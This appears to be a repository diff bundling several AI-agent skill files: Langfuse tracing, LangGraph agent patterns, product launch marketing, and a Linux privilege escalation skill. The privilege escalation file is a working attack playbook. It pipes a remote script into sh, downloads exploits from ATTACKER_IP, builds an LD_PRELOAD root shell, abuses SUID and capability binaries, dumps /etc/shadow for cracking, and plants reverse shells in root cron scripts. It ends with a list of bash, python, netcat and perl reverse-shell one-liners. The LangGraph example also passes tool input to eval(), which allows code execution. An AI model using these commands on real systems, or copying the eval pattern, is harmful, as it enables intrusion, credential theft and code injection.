description: "Expert in Langfuse - the open-source LLM observability platform. Covers tracing, prompt management, evaluation, datasets, and integration with LangChain, LlamaIndex, and OpenAI. Essential for debugging, monitoring, and improving LLM applications in production. Use when: langfuse, llm observability, llm tracing, prompt management, llm evaluation."
source: vibeship-spawner-skills (Apache 2.0)
---
# Langfuse
**Role**: LLM Observability Architect
You are an expert in LLM observability and evaluation. You think in terms of
traces, spans, and metrics. You know that LLM applications need monitoring
just like traditional software - but with different dimensions (cost, quality,
latency). You use data to drive prompt improvements and catch regressions.
## Capabilities
- LLM tracing and observability
- Prompt management and versioning
- Evaluation and scoring
- Dataset management
- Cost tracking
- Performance monitoring
- A/B testing prompts
## Requirements
- Python or TypeScript/JavaScript
- Langfuse account (cloud or self-hosted)
- LLM API keys
## Patterns
### Basic Tracing Setup
Instrument LLM calls with Langfuse
**When to use**: Any LLM application
```python
from langfuse import Langfuse
# Initialize client
langfuse = Langfuse(
public_key="pk-...",
secret_key="sk-...",
host="https://cloud.langfuse.com" # or self-hosted URL
)
# Create a trace for a user request
trace = langfuse.trace(
name="chat-completion",
user_id="user-123",
session_id="session-456", # Groups related traces
metadata={"feature": "customer-support"},
tags=["production", "v2"]
)
# Log a generation (LLM call)
generation = trace.generation(
name="gpt-4o-response",
model="gpt-4o",
model_parameters={"temperature": 0.7},
input={"messages": [{"role": "user", "content": "Hello"}]},
metadata={"attempt": 1}
)
# Make actual LLM call
response = openai.chat.completions.create(
model="gpt-4o",
messages=[{"role": "user", "content": "Hello"}]
)
# Complete the generation with output
generation.end(
output=response.choices[0].message.content,
usage={
"input": response.usage.prompt_tokens,
"output": response.usage.completion_tokens
}
)
# Score the trace
trace.score(
name="user-feedback",
value=1, # 1 = positive, 0 = negative
comment="User clicked helpful"
)
# Flush before exit (important in serverless)
langfuse.flush()
```
### OpenAI Integration
Automatic tracing with OpenAI SDK
**When to use**: OpenAI-based applications
```python
from langfuse.openai import openai
# Drop-in replacement for OpenAI client
# All calls automatically traced
response = openai.chat.completions.create(
model="gpt-4o",
messages=[{"role": "user", "content": "Hello"}],
# Langfuse-specific parameters
name="greeting", # Trace name
session_id="session-123",
user_id="user-456",
tags=["test"],
metadata={"feature": "chat"}
)
# Works with streaming
stream = openai.chat.completions.create(
model="gpt-4o",
messages=[{"role": "user", "content": "Tell me a story"}],
stream=True,
name="story-generation"
)
for chunk in stream:
print(chunk.choices[0].delta.content, end="")
# Works with async
import asyncio
from langfuse.openai import AsyncOpenAI
async_client = AsyncOpenAI()
async def main():
response = await async_client.chat.completions.create(
model="gpt-4o",
messages=[{"role": "user", "content": "Hello"}],
name="async-greeting"
)
```
### LangChain Integration
Trace LangChain applications
**When to use**: LangChain-based applications
```python
from langchain_openai import ChatOpenAI
from langchain_core.prompts import ChatPromptTemplate
from langfuse.callback import CallbackHandler
# Create Langfuse callback handler
langfuse_handler = CallbackHandler(
public_key="pk-...",
secret_key="sk-...",
host="https://cloud.langfuse.com",
session_id="session-123",
user_id="user-456"
)
# Use with any LangChain component
llm = ChatOpenAI(model="gpt-4o")
prompt = ChatPromptTemplate.from_messages([
("system", "You are a helpful assistant."),
("user", "{input}")
])
chain = prompt | llm
# Pass handler to invoke
response = chain.invoke(
{"input": "Hello"},
config={"callbacks": [langfuse_handler]}
)
# Or set as default
import langchain
langchain.callbacks.manager.set_handler(langfuse_handler)
# Then all calls are traced
response = chain.invoke({"input": "Hello"})
# Works with agents, retrievers, etc.
from langchain.agents import create_openai_tools_agent
agent = create_openai_tools_agent(llm, tools, prompt)
agent_executor = AgentExecutor(agent=agent, tools=tools)
result = agent_executor.invoke(
{"input": "What's the weather?"},
config={"callbacks": [langfuse_handler]}
)
```
## Anti-Patterns
### ❌ Not Flushing in Serverless
**Why bad**: Traces are batched.
Serverless may exit before flush.
Data is lost.
**Instead**: Always call langfuse.flush() at end.
Use context managers where available.
Consider sync mode for critical traces.
### ❌ Tracing Everything
**Why bad**: Noisy traces.
Performance overhead.
Hard to find important info.
**Instead**: Focus on: LLM calls, key logic, user actions.
Group related operations.
Use meaningful span names.
### ❌ No User/Session IDs
**Why bad**: Can't debug specific users.
Can't track sessions.
Analytics limited.
**Instead**: Always pass user_id and session_id.
Use consistent identifiers.
Add relevant metadata.
## Limitations
- Self-hosted requires infrastructure
- High-volume may need optimization
- Real-time dashboard has latency
- Evaluation requires setup
## Related Skills
Works well with: `langgraph`, `crewai`, `structured-output`, `autonomous-agents`

287
skills/langgraph/SKILL.md Normal file
View File

@@ -0,0 +1,287 @@
---
name: langgraph
description: "Expert in LangGraph - the production-grade framework for building stateful, multi-actor AI applications. Covers graph construction, state management, cycles and branches, persistence with checkpointers, human-in-the-loop patterns, and the ReAct agent pattern. Used in production at LinkedIn, Uber, and 400+ companies. This is LangChain's recommended approach for building agents. Use when: langgraph, langchain agent, stateful agent, agent graph, react agent."
source: vibeship-spawner-skills (Apache 2.0)
---
# LangGraph
**Role**: LangGraph Agent Architect
You are an expert in building production-grade AI agents with LangGraph. You
understand that agents need explicit structure - graphs make the flow visible
and debuggable. You design state carefully, use reducers appropriately, and
always consider persistence for production. You know when cycles are needed
and how to prevent infinite loops.
## Capabilities
- Graph construction (StateGraph)
- State management and reducers
- Node and edge definitions
- Conditional routing
- Checkpointers and persistence
- Human-in-the-loop patterns
- Tool integration
- Streaming and async execution
## Requirements
- Python 3.9+
- langgraph package
- LLM API access (OpenAI, Anthropic, etc.)
- Understanding of graph concepts
## Patterns
### Basic Agent Graph
Simple ReAct-style agent with tools
**When to use**: Single agent with tool calling
```python
from typing import Annotated, TypedDict
from langgraph.graph import StateGraph, START, END
from langgraph.graph.message import add_messages
from langgraph.prebuilt import ToolNode
from langchain_openai import ChatOpenAI
from langchain_core.tools import tool
# 1. Define State
class AgentState(TypedDict):
messages: Annotated[list, add_messages]
# add_messages reducer appends, doesn't overwrite
# 2. Define Tools
@tool
def search(query: str) -> str:
"""Search the web for information."""
# Implementation here
return f"Results for: {query}"
@tool
def calculator(expression: str) -> str:
"""Evaluate a math expression."""
return str(eval(expression))
tools = [search, calculator]
# 3. Create LLM with tools
llm = ChatOpenAI(model="gpt-4o").bind_tools(tools)
# 4. Define Nodes
def agent(state: AgentState) -> dict:
"""The agent node - calls LLM."""
response = llm.invoke(state["messages"])
return {"messages": [response]}
# Tool node handles tool execution
tool_node = ToolNode(tools)
# 5. Define Routing
def should_continue(state: AgentState) -> str:
"""Route based on whether tools were called."""
last_message = state["messages"][-1]
if last_message.tool_calls:
return "tools"
return END
# 6. Build Graph
graph = StateGraph(AgentState)
# Add nodes
graph.add_node("agent", agent)
graph.add_node("tools", tool_node)
# Add edges
graph.add_edge(START, "agent")
graph.add_conditional_edges("agent", should_continue, ["tools", END])
graph.add_edge("tools", "agent") # Loop back
# Compile
app = graph.compile()
# 7. Run
result = app.invoke({
"messages": [("user", "What is 25 * 4?")]
})
```
### State with Reducers
Complex state management with custom reducers
**When to use**: Multiple agents updating shared state
```python
from typing import Annotated, TypedDict
from operator import add
from langgraph.graph import StateGraph
# Custom reducer for merging dictionaries
def merge_dicts(left: dict, right: dict) -> dict:
return {**left, **right}
# State with multiple reducers
class ResearchState(TypedDict):
# Messages append (don't overwrite)
messages: Annotated[list, add_messages]
# Research findings merge
findings: Annotated[dict, merge_dicts]
# Sources accumulate
sources: Annotated[list[str], add]
# Current step (overwrites - no reducer)
current_step: str
# Error count (custom reducer)
errors: Annotated[int, lambda a, b: a + b]
# Nodes return partial state updates
def researcher(state: ResearchState) -> dict:
# Only return fields being updated
return {
"findings": {"topic_a": "New finding"},
"sources": ["source1.com"],
"current_step": "researching"
}
def writer(state: ResearchState) -> dict:
# Access accumulated state
all_findings = state["findings"]
all_sources = state["sources"]
return {
"messages": [("assistant", f"Report based on {len(all_sources)} sources")],
"current_step": "writing"
}
# Build graph
graph = StateGraph(ResearchState)
graph.add_node("researcher", researcher)
graph.add_node("writer", writer)
# ... add edges
```
### Conditional Branching
Route to different paths based on state
**When to use**: Multiple possible workflows
```python
from langgraph.graph import StateGraph, START, END
class RouterState(TypedDict):
query: str
query_type: str
result: str
def classifier(state: RouterState) -> dict:
"""Classify the query type."""
query = state["query"].lower()
if "code" in query or "program" in query:
return {"query_type": "coding"}
elif "search" in query or "find" in query:
return {"query_type": "search"}
else:
return {"query_type": "chat"}
def coding_agent(state: RouterState) -> dict:
return {"result": "Here's your code..."}
def search_agent(state: RouterState) -> dict:
return {"result": "Search results..."}
def chat_agent(state: RouterState) -> dict:
return {"result": "Let me help..."}
# Routing function
def route_query(state: RouterState) -> str:
"""Route to appropriate agent."""
query_type = state["query_type"]
return query_type # Returns node name
# Build graph
graph = StateGraph(RouterState)
graph.add_node("classifier", classifier)
graph.add_node("coding", coding_agent)
graph.add_node("search", search_agent)
graph.add_node("chat", chat_agent)
graph.add_edge(START, "classifier")
# Conditional edges from classifier
graph.add_conditional_edges(
"classifier",
route_query,
{
"coding": "coding",
"search": "search",
"chat": "chat"
}
)
# All agents lead to END
graph.add_edge("coding", END)
graph.add_edge("search", END)
graph.add_edge("chat", END)
app = graph.compile()
```
## Anti-Patterns
### ❌ Infinite Loop Without Exit
**Why bad**: Agent loops forever.
Burns tokens and costs.
Eventually errors out.
**Instead**: Always have exit conditions:
- Max iterations counter in state
- Clear END conditions in routing
- Timeout at application level
def should_continue(state):
if state["iterations"] > 10:
return END
if state["task_complete"]:
return END
return "agent"
### ❌ Stateless Nodes
**Why bad**: Loses LangGraph's benefits.
State not persisted.
Can't resume conversations.
**Instead**: Always use state for data flow.
Return state updates from nodes.
Use reducers for accumulation.
Let LangGraph manage state.
### ❌ Giant Monolithic State
**Why bad**: Hard to reason about.
Unnecessary data in context.
Serialization overhead.
**Instead**: Use input/output schemas for clean interfaces.
Private state for internal data.
Clear separation of concerns.
## Limitations
- Python-only (TypeScript in early stages)
- Learning curve for graph concepts
- State management complexity
- Debugging can be challenging
## Related Skills
Works well with: `crewai`, `autonomous-agents`, `langfuse`, `structured-output`

344
skills/launch-strategy/SKILL.md Normal file
View File

@@ -0,0 +1,344 @@
---
name: launch-strategy
description: "When the user wants to plan a product launch, feature announcement, or release strategy. Also use when the user mentions 'launch,' 'Product Hunt,' 'feature release,' 'announcement,' 'go-to-market,' 'beta launch,' 'early access,' 'waitlist,' or 'product update.' This skill covers phased launches, channel strategy, and ongoing launch momentum."
---
# Launch Strategy
You are an expert in SaaS product launches and feature announcements. Your goal is to help users plan launches that build momentum, capture attention, and convert interest into users.
## Core Philosophy
The best companies don't just launch once—they launch again and again. Every new feature, improvement, and update is an opportunity to capture attention and engage your audience.
A strong launch isn't about a single moment. It's about:
- Getting your product into users' hands early
- Learning from real feedback
- Making a splash at every stage
- Building momentum that compounds over time
---
## The ORB Framework
Structure your launch marketing across three channel types. Everything should ultimately lead back to owned channels.
### Owned Channels
You own the channel (though not the audience). Direct access without algorithms or platform rules.
**Examples:**
- Email list
- Blog
- Podcast
- Branded community (Slack, Discord)
- Website/product
**Why they matter:**
- Get more effective over time
- No algorithm changes or pay-to-play
- Direct relationship with audience
- Compound value from content
**Start with 1-2 based on audience:**
- Industry lacks quality content → Start a blog
- People want direct updates → Focus on email
- Engagement matters → Build a community
**Example - Superhuman:**
Built demand through an invite-only waitlist and one-on-one onboarding sessions. Every new user got a 30-minute live demo. This created exclusivity, FOMO, and word-of-mouth—all through owned relationships. Years later, their original onboarding materials still drive engagement.
### Rented Channels
Platforms that provide visibility but you don't control. Algorithms shift, rules change, pay-to-play increases.
**Examples:**
- Social media (Twitter/X, LinkedIn, Instagram)
- App stores and marketplaces
- YouTube
- Reddit
**How to use correctly:**
- Pick 1-2 platforms where your audience is active
- Use them to drive traffic to owned channels
- Don't rely on them as your only strategy
**Example - Notion:**
Hacked virality through Twitter, YouTube, and Reddit where productivity enthusiasts were active. Encouraged community to share templates and workflows. But they funneled all visibility into owned assets—every viral post led to signups, then targeted email onboarding.
**Platform-specific tactics:**
- Twitter/X: Threads that spark conversation → link to newsletter
- LinkedIn: High-value posts → lead to gated content or email signup
- Marketplaces (Shopify, Slack): Optimize listing → drive to site for more
Rented channels give speed, not stability. Capture momentum by bringing users into your owned ecosystem.
### Borrowed Channels
Tap into someone else's audience to shortcut the hardest part—getting noticed.
**Examples:**
- Guest content (blog posts, podcast interviews, newsletter features)
- Collaborations (webinars, co-marketing, social takeovers)
- Speaking engagements (conferences, panels, virtual summits)
- Influencer partnerships
**Be proactive, not passive:**
1. List industry leaders your audience follows
2. Pitch win-win collaborations
3. Use tools like SparkToro or Listen Notes to find audience overlap
4. Set up affiliate/referral incentives
**Example - TRMNL:**
Sent a free e-ink display to YouTuber Snazzy Labs—not a paid sponsorship, just hoping he'd like it. He created an in-depth review that racked up 500K+ views and drove $500K+ in sales. They also set up an affiliate program for ongoing promotion.
Borrowed channels give instant credibility, but only work if you convert borrowed attention into owned relationships.
---
## Five-Phase Launch Approach
Launching isn't a one-day event. It's a phased process that builds momentum.
### Phase 1: Internal Launch
Gather initial feedback and iron out major issues before going public.
**Actions:**
- Recruit early users one-on-one to test for free
- Collect feedback on usability gaps and missing features
- Ensure prototype is functional enough to demo (doesn't need to be production-ready)
**Goal:** Validate core functionality with friendly users.
### Phase 2: Alpha Launch
Put the product in front of external users in a controlled way.
**Actions:**
- Create landing page with early access signup form
- Announce the product exists
- Invite users individually to start testing
- MVP should be working in production (even if still evolving)
**Goal:** First external validation and initial waitlist building.
### Phase 3: Beta Launch
Scale up early access while generating external buzz.
**Actions:**
- Work through early access list (some free, some paid)
- Start marketing with teasers about problems you solve
- Recruit friends, investors, and influencers to test and share
**Consider adding:**
- Coming soon landing page or waitlist
- "Beta" sticker in dashboard navigation
- Email invites to early access list
- Early access toggle in settings for experimental features
**Goal:** Build buzz and refine product with broader feedback.
### Phase 4: Early Access Launch
Shift from small-scale testing to controlled expansion.
**Actions:**
- Leak product details: screenshots, feature GIFs, demos
- Gather quantitative usage data and qualitative feedback
- Run user research with engaged users (incentivize with credits)
- Optionally run product/market fit survey to refine messaging
**Expansion options:**
- Option A: Throttle invites in batches (5-10% at a time)
- Option B: Invite all users at once under "early access" framing
**Goal:** Validate at scale and prepare for full launch.
### Phase 5: Full Launch
Open the floodgates.
**Actions:**
- Open self-serve signups
- Start charging (if not already)
- Announce general availability across all channels
**Launch touchpoints:**
- Customer emails
- In-app popups and product tours
- Website banner linking to launch assets
- "New" sticker in dashboard navigation
- Blog post announcement
- Social posts across platforms
- Product Hunt, BetaList, Hacker News, etc.
**Goal:** Maximum visibility and conversion to paying users.
---
## Product Hunt Launch Strategy
Product Hunt can be powerful for reaching early adopters, but it's not magic—it requires preparation.
### Pros
- Exposure to tech-savvy early adopter audience
- Credibility bump (especially if Product of the Day)
- Potential PR coverage and backlinks
### Cons
- Very competitive to rank well
- Short-lived traffic spikes
- Requires significant pre-launch planning
### How to Launch Successfully
**Before launch day:**
1. Build relationships with influential supporters, content hubs, and communities
2. Optimize your listing: compelling tagline, polished visuals, short demo video
3. Study successful launches to identify what worked
4. Engage in relevant communities—provide value before pitching
5. Prepare your team for all-day engagement
**On launch day:**
1. Treat it as an all-day event
2. Respond to every comment in real-time
3. Answer questions and spark discussions
4. Encourage your existing audience to engage
5. Direct traffic back to your site to capture signups
**After launch day:**
1. Follow up with everyone who engaged
2. Convert Product Hunt traffic into owned relationships (email signups)
3. Continue momentum with post-launch content
### Case Studies
**SavvyCal** (Scheduling tool):
- Optimized landing page and onboarding before launch
- Built relationships with productivity/SaaS influencers in advance
- Responded to every comment on launch day
- Result: #2 Product of the Month
**Reform** (Form builder):
- Studied successful launches and applied insights
- Crafted clear tagline, polished visuals, demo video
- Engaged in communities before launch (provided value first)
- Treated launch as all-day engagement event
- Directed traffic to capture signups
- Result: #1 Product of the Day
---
## Post-Launch Product Marketing
Your launch isn't over when the announcement goes live. Now comes adoption and retention work.
### Immediate Post-Launch Actions
**Educate new users:**
Set up automated onboarding email sequence introducing key features and use cases.
**Reinforce the launch:**
Include announcement in your weekly/biweekly/monthly roundup email to catch people who missed it.
**Differentiate against competitors:**
Publish comparison pages highlighting why you're the obvious choice.
**Update web pages:**
Add dedicated sections about the new feature/product across your site.
**Offer hands-on preview:**
Create no-code interactive demo (using tools like Navattic) so visitors can explore before signing up.
### Keep Momentum Going
It's easier to build on existing momentum than start from scratch. Every touchpoint reinforces the launch.
---
## Ongoing Launch Strategy
Don't rely on a single launch event. Regular updates and feature rollouts sustain engagement.
### How to Prioritize What to Announce
Use this matrix to decide how much marketing each update deserves:
**Major updates** (new features, product overhauls):
- Full campaign across multiple channels
- Blog post, email campaign, in-app messages, social media
- Maximize exposure
**Medium updates** (new integrations, UI enhancements):
- Targeted announcement
- Email to relevant segments, in-app banner
- Don't need full fanfare
**Minor updates** (bug fixes, small tweaks):
- Changelog and release notes
- Signal that product is improving
- Don't dominate marketing
### Announcement Tactics
**Space out releases:**
Instead of shipping everything at once, stagger announcements to maintain momentum.
**Reuse high-performing tactics:**
If a previous announcement resonated, apply those insights to future updates.
**Keep engaging:**
Continue using email, social, and in-app messaging to highlight improvements.
**Signal active development:**
Even small changelog updates remind customers your product is evolving. This builds retention and word-of-mouth—customers feel confident you'll be around.
---
## Launch Checklist
### Pre-Launch
- [ ] Landing page with clear value proposition
- [ ] Email capture / waitlist signup
- [ ] Early access list built
- [ ] Owned channels established (email, blog, community)
- [ ] Rented channel presence (social profiles optimized)
- [ ] Borrowed channel opportunities identified (podcasts, influencers)
- [ ] Product Hunt listing prepared (if using)
- [ ] Launch assets created (screenshots, demo video, GIFs)
- [ ] Onboarding flow ready
- [ ] Analytics/tracking in place
### Launch Day
- [ ] Announcement email to list
- [ ] Blog post published
- [ ] Social posts scheduled and posted
- [ ] Product Hunt listing live (if using)
- [ ] In-app announcement for existing users
- [ ] Website banner/notification active
- [ ] Team ready to engage and respond
- [ ] Monitor for issues and feedback
### Post-Launch
- [ ] Onboarding email sequence active
- [ ] Follow-up with engaged prospects
- [ ] Roundup email includes announcement
- [ ] Comparison pages published
- [ ] Interactive demo created
- [ ] Gather and act on feedback
- [ ] Plan next launch moment
---
## Questions to Ask
If you need more context:
1. What are you launching? (New product, major feature, minor update)
2. What's your current audience size and engagement?
3. What owned channels do you have? (Email list size, blog traffic, community)
4. What's your timeline for launch?
5. Have you launched before? What worked/didn't work?
6. Are you considering Product Hunt? What's your preparation status?
---
## Related Skills
- **marketing-ideas**: For additional launch tactics (#22 Product Hunt, #23 Early Access Referrals)
- **email-sequence**: For launch and onboarding email sequences
- **page-cro**: For optimizing launch landing pages
- **marketing-psychology**: For psychology behind waitlists and exclusivity
- **programmatic-seo**: For comparison pages mentioned in post-launch

501
skills/linux-privilege-escalation/SKILL.md Normal file
View File

@@ -0,0 +1,501 @@
---
name: Linux Privilege Escalation
description: This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". It provides comprehensive techniques for identifying and exploiting privilege escalation paths on Linux systems.
---
# Linux Privilege Escalation
## Purpose
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.
## Inputs / Prerequisites
### Required Access
- Low-privilege shell access to target Linux system
- Ability to execute commands (interactive or semi-interactive shell)
- Network access for reverse shell connections (if needed)
- Attacker machine for payload hosting and receiving shells
### Technical Requirements
- Understanding of Linux filesystem permissions and ownership
- Familiarity with common Linux utilities and scripting
- Knowledge of kernel versions and associated vulnerabilities
- Basic understanding of compilation (gcc) for custom exploits
### Recommended Tools
- LinPEAS, LinEnum, or Linux Smart Enumeration scripts
- Linux Exploit Suggester (LES)
- GTFOBins reference for binary exploitation
- John the Ripper or Hashcat for password cracking
- Netcat or similar for reverse shells
## Outputs / Deliverables
### Primary Outputs
- Root shell access on target system
- Privilege escalation path documentation
- System enumeration findings report
- Recommendations for remediation
### Evidence Artifacts
- Screenshots of successful privilege escalation
- Command output logs demonstrating root access
- Identified vulnerability details
- Exploited configuration files
## Core Workflow
### Phase 1: System Enumeration
#### Basic System Information
Gather fundamental system details for vulnerability research:
```bash
# Hostname and system role
hostname
# Kernel version and architecture
uname -a
# Detailed kernel information
cat /proc/version
# Operating system details
cat /etc/issue
cat /etc/*-release
# Architecture
arch
```
#### User and Permission Enumeration
```bash
# Current user context
whoami
id
# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false
# Users with home directories
cat /etc/passwd | grep home
# Group memberships
groups
# Other logged-in users
w
who
```
#### Network Information
```bash
# Network interfaces
ifconfig
ip addr
# Routing table
ip route
# Active connections
netstat -antup
ss -tulpn
# Listening services
netstat -l
```
#### Process and Service Enumeration
```bash
# All running processes
ps aux
ps -ef
# Process tree view
ps axjf
# Services running as root
ps aux | grep root
```
#### Environment Variables
```bash
# Full environment
env
# PATH variable (for hijacking)
echo $PATH
```
### Phase 2: Automated Enumeration
Deploy automated scripts for comprehensive enumeration:
```bash
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Linux Smart Enumeration
./lse.sh -l 1
# Linux Exploit Suggester
./les.sh
```
Transfer scripts to target system:
```bash
# On attacker machine
python3 -m http.server 8000
# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```
### Phase 3: Kernel Exploits
#### Identify Kernel Version
```bash
uname -r
cat /proc/version
```
#### Search for Exploits
```bash
# Use Linux Exploit Suggester
./linux-exploit-suggester.sh
# Manual search on exploit-db
searchsploit linux kernel [version]
```
#### Common Kernel Exploits
| Kernel Version | Exploit | CVE |
|---------------|---------|-----|
| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |
| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |
| 5.8+ | Dirty Pipe | CVE-2022-0847 |
#### Compile and Execute
```bash
# Transfer exploit source
wget http://ATTACKER_IP/exploit.c
# Compile on target
gcc exploit.c -o exploit
# Execute
./exploit
```
### Phase 4: Sudo Exploitation
#### Enumerate Sudo Privileges
```bash
sudo -l
```
#### GTFOBins Sudo Exploitation
Reference https://gtfobins.github.io for exploitation commands:
```bash
# Example: vim with sudo
sudo vim -c ':!/bin/bash'
# Example: find with sudo
sudo find . -exec /bin/sh \; -quit
# Example: awk with sudo
sudo awk 'BEGIN {system("/bin/bash")}'
# Example: python with sudo
sudo python -c 'import os; os.system("/bin/bash")'
# Example: less with sudo
sudo less /etc/passwd
!/bin/bash
```
#### LD_PRELOAD Exploitation
When env_keep includes LD_PRELOAD:
```c
// shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
```
```bash
# Compile shared library
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# Execute with sudo
sudo LD_PRELOAD=/tmp/shell.so find
```
### Phase 5: SUID Binary Exploitation
#### Find SUID Binaries
```bash
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
```
#### Exploit SUID Binaries
Reference GTFOBins for SUID exploitation:
```bash
# Example: base64 for file reading
LFILE=/etc/shadow
base64 "$LFILE" | base64 -d
# Example: cp for file writing
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p
# Example: find with SUID
find . -exec /bin/sh -p \; -quit
```
#### Password Cracking via SUID
```bash
# Read shadow file (if base64 has SUID)
base64 /etc/shadow | base64 -d > shadow.txt
base64 /etc/passwd | base64 -d > passwd.txt
# On attacker machine
unshadow passwd.txt shadow.txt > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```
#### Add User to passwd (if nano/vim has SUID)
```bash
# Generate password hash
openssl passwd -1 -salt new newpassword
# Add to /etc/passwd (using SUID editor)
newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
```
### Phase 6: Capabilities Exploitation
#### Enumerate Capabilities
```bash
getcap -r / 2>/dev/null
```
#### Exploit Capabilities
```bash
# Example: python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Example: vim with cap_setuid
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'
# Example: perl with cap_setuid
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
```
### Phase 7: Cron Job Exploitation
#### Enumerate Cron Jobs
```bash
# System crontab
cat /etc/crontab
# User crontabs
ls -la /var/spool/cron/crontabs/
# Cron directories
ls -la /etc/cron.*
# Systemd timers
systemctl list-timers
```
#### Exploit Writable Cron Scripts
```bash
# Identify writable cron script from /etc/crontab
ls -la /opt/backup.sh # Check permissions
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh
# If cron references non-existent script in writable PATH
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
chmod +x /home/user/antivirus.sh
```
### Phase 8: PATH Hijacking
```bash
# Find SUID binary calling external command
strings /usr/local/bin/suid-binary
# Shows: system("service apache2 start")
# Hijack by creating malicious binary in writable PATH
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service
/usr/local/bin/suid-binary # Execute SUID binary
```
### Phase 9: NFS Exploitation
```bash
# On target - look for no_root_squash option
cat /etc/exports
# On attacker - mount share and create SUID binary
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs
# Create and compile SUID shell
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell
# On target - execute
/share/shell
```
## Quick Reference
### Enumeration Commands Summary
| Purpose | Command |
|---------|---------|
| Kernel version | `uname -a` |
| Current user | `id` |
| Sudo rights | `sudo -l` |
| SUID files | `find / -perm -u=s -type f 2>/dev/null` |
| Capabilities | `getcap -r / 2>/dev/null` |
| Cron jobs | `cat /etc/crontab` |
| Writable dirs | `find / -writable -type d 2>/dev/null` |
| NFS exports | `cat /etc/exports` |
### Reverse Shell One-Liners
```bash
# Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
# Netcat
nc -e /bin/bash ATTACKER_IP 4444
# Perl
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'
```
### Key Resources
- GTFOBins: https://gtfobins.github.io
- LinPEAS: https://github.com/carlospolop/PEASS-ng
- Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester
## Constraints and Guardrails
### Operational Boundaries
- Verify kernel exploits in test environment before production use
- Failed kernel exploits may crash the system
- Document all changes made during privilege escalation
- Maintain access persistence only as authorized
### Technical Limitations
- Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)
- AppArmor/SELinux may restrict exploitation techniques
- Container environments limit kernel-level exploits
- Hardened systems may have restricted sudo configurations
### Legal and Ethical Requirements
- Written authorization required before testing
- Stay within defined scope boundaries
- Report critical findings immediately
- Do not access data beyond scope requirements
## Examples
### Example 1: Sudo to Root via find
**Scenario**: User has sudo rights for find command
```bash
$ sudo -l
User user may run the following commands:
(root) NOPASSWD: /usr/bin/find
$ sudo find . -exec /bin/bash \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)
```
### Example 2: SUID base64 for Shadow Access
**Scenario**: base64 binary has SUID bit set
```bash
$ find / -perm -u=s -type f 2>/dev/null | grep base64
/usr/bin/base64
$ base64 /etc/shadow | base64 -d
root:$6$xyz...:18000:0:99999:7:::
# Crack offline with john
$ john --wordlist=rockyou.txt shadow.txt
```
### Example 3: Cron Job Script Hijacking
**Scenario**: Root cron job executes writable script
```bash
$ cat /etc/crontab
* * * * * root /opt/scripts/backup.sh
$ ls -la /opt/scripts/backup.sh
-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh
$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh
# Wait 1 minute
$ /tmp/bash -p
# id
uid=1000(user) gid=1000(user) euid=0(root)
```
## Troubleshooting
| Issue | Solutions |
|-------|-----------|
| Exploit compilation fails | Check for gcc: `which gcc`; compile on attacker for same arch; use `gcc -static` |
| Reverse shell not connecting | Check firewall; try ports 443/80; use staged payloads; check egress filtering |
| SUID binary not exploitable | Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges |
| Cron job not executing | Verify cron running: `service cron status`; check +x permissions; verify PATH in crontab |

760
skills/llm-app-patterns/SKILL.md Normal file
View File

@@ -0,0 +1,760 @@
---
name: llm-app-patterns
description: "Production-ready patterns for building LLM applications. Covers RAG pipelines, agent architectures, prompt IDEs, and LLMOps monitoring. Use when designing AI applications, implementing RAG, building agents, or setting up LLM observability."
---
# 🤖 LLM Application Patterns
> Production-ready patterns for building LLM applications, inspired by [Dify](https://github.com/langgenius/dify) and industry best practices.
## When to Use This Skill
Use this skill when:
- Designing LLM-powered applications
